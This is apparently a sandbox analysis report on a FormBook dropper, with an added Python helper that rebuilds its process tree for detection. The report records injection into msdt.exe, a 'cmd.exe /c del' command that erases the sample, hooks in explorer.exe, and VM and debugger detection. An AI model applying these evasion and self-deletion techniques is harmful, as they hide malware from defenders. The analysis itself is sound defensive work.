Source: C:\Users\user\Desktop\cryptedprof.exe | File read: C:\Users\user\Desktop\cryptedprof.exe
Source: unknown | Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
Source: unknown | Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cryptedprof.exe | Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
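The process lines above carry the whole execution story in seven entries: the NSIS dropper re-launches itself (the re-launched copy is where the unpacked FormBook image sits at 0x400000), a Windows troubleshooting binary, msdt.exe, appears with no arguments, and it is msdt.exe, not the sample, that later runs cmd.exe /c del against the dropper. The helper below is an added example written for this edit in Python, not part of the Joe Sandbox report. It rebuilds parent/child pairs from "Process created" lines as printed in the listing and flags those three patterns. The heuristics and the "system binary" directory list are the editor's assumptions; the embedded input is an excerpt copied from the listing.

```python
"""Rebuild the process tree from the report's "Process created" lines and
flag self re-execution, an argument-less system binary, and deletion of
the sample by some other process. Added example: editor's heuristics."""
import re

# Excerpt copied from the listing above (constructed input for the parser).
# "Source: unknown" lines are the flat process list; lines with an explicit
# Source are the parent -> child edges.
PROCESS_LINES = r"""
Source: unknown | Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
Source: unknown | Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cryptedprof.exe | Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
"""

SAMPLE_PATH = r"C:\Users\user\Desktop\cryptedprof.exe"

# "Source: <parent> | Process created: <image>.exe <command line>"
# The "|" is optional so the raw, unseparated form parses as well.
PROC_RE = re.compile(
    r"Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*"
    r"(?P<image>\S+?\.exe)\s*(?P<cmd>.*)$", re.IGNORECASE)
# cmd.exe /c del '<path>'  (quotes as the report prints them)
DEL_RE = re.compile(r"/c\s+del\s+'?(?P<target>[^']+?)'?\s*$", re.IGNORECASE)
# Assumption: binaries under these directories count as "system binaries".
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_process_events(text):
    """Return [(parent, image, command_line)]; parent is 'unknown' when
    the report recorded no creating process for that line."""
    events = []
    for line in text.splitlines():
        m = PROC_RE.search(line.strip())
        if m:
            events.append((m["parent"], m["image"], m["cmd"].strip()))
    return events


def process_findings(text, sample_path):
    """Sorted, de-duplicated (finding, image-or-parent) pairs."""
    sample = sample_path.lower()
    findings = set()
    for parent, image, cmd in parse_process_events(text):
        img = image.lower()
        # 1. the sample starting a second copy of itself (unpack-and-inject host)
        if parent.lower() == img:
            findings.add(("self re-execution", image))
        # 2. a system binary whose command line is nothing but its own path
        if img.startswith(SYSTEM_DIRS) and cmd.strip("'\"").lower() == img:
            findings.add(("system binary started without arguments", image))
        # 3. cmd.exe deleting the sample on behalf of a process that is not the sample
        if img.endswith("\\cmd.exe") and parent.lower() != "unknown":
            d = DEL_RE.search(cmd)
            if d and d["target"].lower() == sample and parent.lower() != sample:
                findings.add(("sample deleted by another process", parent))
    return sorted(findings)


if __name__ == "__main__":
    for finding, who in process_findings(PROCESS_LINES, SAMPLE_PATH):
        print(f"{finding}: {who}")
```

The third finding is the one worth a detection rule on its own: the dropper cannot delete itself while it is running, so the injected code inside msdt.exe does it, and a process under C:\Windows\SysWOW64 spawning cmd.exe to delete a file on a user's Desktop has no benign explanation. msdt.exe itself is a legitimate diagnostics host; the anomaly is the empty command line and the child it spawns, not its presence.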
Source: C:\Users\user\Desktop\cryptedprof.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: cryptedprof.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL | source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: cryptedprof.exe, msdt.exe
Source: Binary string: msdt.pdb | source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\cryptedprof.exe | Unpacked PE file: 3.2.cryptedprof.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_70991A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: 8chdn.dll.1.dr | Static PE information: section name: .code
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_70992F60 push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00416A63 push esp; retf
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00416AF0 pushfd ; iretd
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00416AA8 push esp; retf
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00417B8F push ebp; ret
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_004173B1 push edx; retf
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_004135D2 push cs; ret
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B0D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C76AF0 pushfd ; iretd
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C76AA8 push esp; retf
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C76A63 push esp; retf
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C77B8F push ebp; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C773B1 push edx; retf
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7CF6C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7CF02 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7CF0B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C735D2 push cs; ret
          Source: initial sample | Static PE information: section name: .data entropy: 7.23183783874
          Source: C:\Users\user\Desktop\cryptedprof.exe | File created: C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll
          Source: C:\Users\user\Desktop\cryptedprof.exe | File created: C:\Users\user\AppData\Local\Temp\8chdn.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEA
          Source: C:\Users\user\Desktop\cryptedprof.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\cryptedprof.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000002C698E4 second address: 0000000002C698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000002C69B5E second address: 0000000002C69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 4928 | Thread sleep time: -58000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_004065C1 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000002.601400852.000000000461E000.00000004.00000001.sdmp | Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60200-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&%
          Source: explorer.exe, 00000005.00000000.351918653.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.345049804.000000000461E000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.349105982.0000000006410000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.351918653.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\cryptedprof.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\cryptedprof.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_70991A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_6FC24582 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_6FC24785 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B88A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B44257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B85BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B6D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B623E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
